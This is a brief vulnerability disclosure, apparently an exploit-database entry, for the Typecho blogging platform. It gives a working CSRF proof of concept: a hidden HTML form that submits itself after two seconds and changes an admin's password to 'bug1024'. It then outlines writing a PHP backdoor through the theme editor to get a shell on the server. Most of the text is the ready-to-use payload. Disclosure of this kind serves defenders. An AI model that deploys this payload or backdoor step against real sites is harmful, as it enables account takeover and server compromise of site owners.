[*] 1. Description
http://typecho/admin/profile.php page, Change password form CSRF vul.
http://typecho/admin/themes.php, We can write the PHP Backdoor in this page.
[*] 2. CSRF POC
<div style="display: none;">
<form action="http://typecho/index.php/action/users-profile" method="post" name="ff0000team" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="password" value="bug1024"/>
<input type="hidden" name="confirm" value="bug1024" />
<input name="do" type="hidden" value="password" />
<button type="submit"></button>
</form>
</div>
<script>
setTimeout("document.ff0000team.submit()", 2000);
</script>
[*] 3. GETSHELL
http://typecho/admin/theme-editor.php page, Write backdoor.
by http://www.hackersoul.com/typecho/ff0000-hsdb-0002.html